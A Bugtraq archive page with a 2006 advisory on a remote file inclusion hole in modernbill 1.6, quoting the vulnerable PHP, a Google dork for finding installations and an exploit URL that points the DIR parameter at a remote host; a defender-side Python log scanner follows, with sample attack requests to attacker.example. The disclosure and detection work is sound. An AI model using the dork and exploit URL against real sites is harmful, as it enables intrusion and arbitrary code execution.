Bugtraq mailing list archives
SolpotCrew Advisory #5 - modernbill ver 1.6 (DIR) Remote File Inclusion
From: chris_hasibuan () yahoo com
Date: 3 Aug 2006 14:29:51 -0000
#############################SolpotCrew Community################################
#
# modernbill ver 1.6 (DIR) Remote File Inclusion
#
# Download file : http://freshmeat.net/projects/modernbill/
#
#################################################################################
#
# Bug Found By : Solpot a.k.a (k. Hasibuan) (03-08-2006)
# contact : chris_hasibuan () yahoo com
# Website : http://www.solpotcrew.org/adv/solpot-adv-04.txt
#
################################################################################
#
# Greetz: choi, cow_1seng, Ibnusina, Lappet_tutung, h4ntu, r4dja,
# L0sTBoy, Matdhule, setiawan, barbarosa, NpR, Fungky, Blue|spy,
# home_edition2001, Rendy, Tje, m3lky, no-profile, bYu
# and all crew #mardongan @ irc.dal.net
#
###############################################################################

Input passed to the "DIR" parameter is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Code from include/html/config.php:

//include($DIR."include/misc/mod_sessions/session_functions.inc.php");
#session_set_save_handler("sess_mysql_open","","sess_mysql_read","sess_mysql_write","sess_mysql_destroy","sess_mysql_gc");
//session_start();
session_register("set_language");
session_register("v");
$new_language = ($set_language) ? $set_language : NULL ;
$signup_form = TRUE;
// $DIR is taken straight from the request (see the exploit URL below) and is never
// validated, so an attacker-controlled URL or path becomes the include prefix.
include_once($DIR."include/functions.inc.php");
## ------------------------------------------------------
## DO NOT CHANGE STOP
## ------------------------------------------------------

google dork : allinurl:/modernbill/

exploit: http://somehost/modernbill/include/html/config.php?DIR=http://evilcode

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################
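As an added defender-side example (not part of the advisory or of ModernBill), the following Python scanner walks access-log lines and flags requests where an include parameter such as DIR carries a remote URL, which is the request shape the advisory describes. The log lines are constructed for illustration; the parameter name DIR is the one from the advisory, the log format is assumed to be common/combined.

```python
"""Added example (not from the advisory): flag RFI attempts where the DIR
include parameter named in the advisory carries a remote resource."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

INCLUDE_PARAMS = {"DIR"}  # parameters the advisory shows reaching include() unvalidated
# Schemes PHP's include() can fetch from an external resource.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# Assumed common/combined log format: ip ident user [ts] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" \d{3}')


def rfi_attempt(path):
    """Return (param, value) if an include parameter points at a remote resource, else None."""
    for name, values in parse_qs(urlsplit(path).query, keep_blank_values=True).items():
        if name.upper() not in INCLUDE_PARAMS:
            continue
        for value in values:
            # parse_qs decoded once already; decode again to catch double-encoded payloads
            if unquote(value).strip().lower().startswith(REMOTE_SCHEMES):
                return name, value
    return None


def scan_log(lines):
    """Return [(client_ip, param, value)] for every request that looks like an RFI attempt."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # skip malformed lines instead of aborting the scan
        found = rfi_attempt(match.group("path"))
        if found:
            hits.append((match.group("ip"),) + found)
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Aug/2006:14:20:01 +0000] "GET /modernbill/index.php?v=1 HTTP/1.1" 200 1024',
    '203.0.113.5 - - [03/Aug/2006:14:29:51 +0000] "GET /modernbill/include/html/config.php?DIR=http://attacker.example/x.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [03/Aug/2006:14:30:02 +0000] "GET /modernbill/include/html/config.php?dir=HTTP%253A%252F%252Fattacker.example%252Fx.txt HTTP/1.1" 200 512',
    '198.51.100.9 - - [03/Aug/2006:14:31:10 +0000] "GET /modernbill/include/html/config.php?DIR=../ HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for ip, param, value in scan_log(SAMPLE_LOG):
        print(f"possible RFI attempt from {ip}: {param}={value}")
```

The last sample line (a local path in DIR) is deliberately not flagged by this check, since it only looks for external resources; local inclusion needs a separate rule.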
Current thread:
- SolpotCrew Advisory #5 - modernbill ver 1.6 (DIR) Remote File Inclusion chris_hasibuan (Aug 03)
- Re: SolpotCrew Advisory #5 - modernbill ver 1.6 (DIR) Remote File Inclusion Mailinglists Address (Aug 07)